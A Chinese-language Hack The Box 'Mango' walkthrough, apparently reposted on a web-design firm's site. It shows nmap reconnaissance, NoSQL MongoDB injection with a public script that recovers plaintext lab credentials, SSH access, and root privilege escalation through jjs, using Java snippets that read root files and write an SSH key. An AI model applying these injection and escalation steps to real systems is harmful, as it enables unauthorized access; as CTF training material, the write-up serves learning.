RELATEED CONSULTING
相关咨询
选择下列产品马上在线沟通
服务时间:8:30-17:00
你可能遇到了下面的问题
关闭右侧工具栏

新闻中心

这里有您想知道的互联网营销解决方案
HTBMango的渗透测试实例

这篇文章主要讲解了“HTB Mango的渗透测试实例”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“HTB Mango的渗透测试实例”吧!

创新互联公司是一家集成都网站制作、成都网站设计、网站页面设计、网站优化SEO优化为一体的专业网站建设公司,已为成都等多地近百家企业提供网站建设服务。追求良好的浏览体验,以探求精品塑造与理念升华,设计最适合用户的网站页面。 合作只是第一步,服务才是根本,我们始终坚持讲诚信,负责任的原则,为您进行细心、贴心、认真的服务,与众多客户在蓬勃发展的市场环境中,互促共生。

前言

本次演练使用kali系统按照渗透测试的过程进行操作,通过前期的信息收集与普通注入不能获取到有用的信息,通过谷歌诸侯知道,可以利用 NOSQL-MongoDB-injection爬取账号与密码,使用ssh远程连接获取user.txt最终通过提权获取root.txt。

一、信息收集

1、靶机ip

ip地址为:10.129.1.219
HTB Mango的渗透测试实例

2、靶机端口与服务

nmap -sV -A -O 10.129.1.219

HTB Mango的渗透测试实例获取到开放端口与版本信息并且获得了正在使用的域名信息

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))

3、网站信息收集

查看80与443端口
HTB Mango的渗透测试实例发现443端口是一个类似于谷歌的搜索界面通过证书获得一些信息
HTB Mango的渗透测试实例

二、漏洞探测与利用

Nosql-MongoDB-injection

将重点放在80端口,这个端口是一个登录界面,经过尝试通过普通的sql注入无法爬取到有用的信息
通过谷歌发现存在Nosql-MongoDB-injection可以利用脚本进行注入尝试获取账号与密码
链接:https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login,submit:submit
python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login,submit:submit

HTB Mango的渗透测试实例HTB Mango的渗透测试实例用户:admin 密码:t9KcS3>!0B#2
用户:mango 密码:h4mXK8RhU~f{]f5H

使用获得的账号密码进行登录
无论使用哪一个都会跳转到这个界面
HTB Mango的渗透测试实例通过ssh进行远程连接 并跳转到admin用户,否则无法查看到admin文件夹下的user.txt
HTB Mango的渗透测试实例HTB Mango的渗透测试实例

三、提权

获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

使用LinEnum.sh查看是否存在可利用信息
最终根据提示找到了jjs可以利用jjs进行提权
HTB Mango的渗透测试实例使用GTFOBins 查看可利用脚本
链接:https://gtfobins.github.io/
HTB Mango的渗透测试实例(1) 通过运行文件读取命令直接获得root.txt

var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }

HTB Mango的渗透测试实例

(2) 通过jjs上传我们自己生成的ssh公钥然后使用我们自己的私钥进行连接获取root权限

ssh-keygen

HTB Mango的渗透测试实例完善脚本信息
HTB Mango的渗透测试实例HTB Mango的渗透测试实例

echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("./file_to_write");
fw.write("DATA");
fw.close();' | jjs

在获取的shell中执行脚本最后在kali中进行登录获取root权限
HTB Mango的渗透测试实例HTB Mango的渗透测试实例

感谢各位的阅读,以上就是“HTB Mango的渗透测试实例”的内容了,经过本文的学习后,相信大家对HTB Mango的渗透测试实例这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是创新互联,小编将为大家推送更多相关知识点的文章,欢迎关注!


本文标题:HTBMango的渗透测试实例
文章源于:http://scyingshan.cn/article/jedohi.html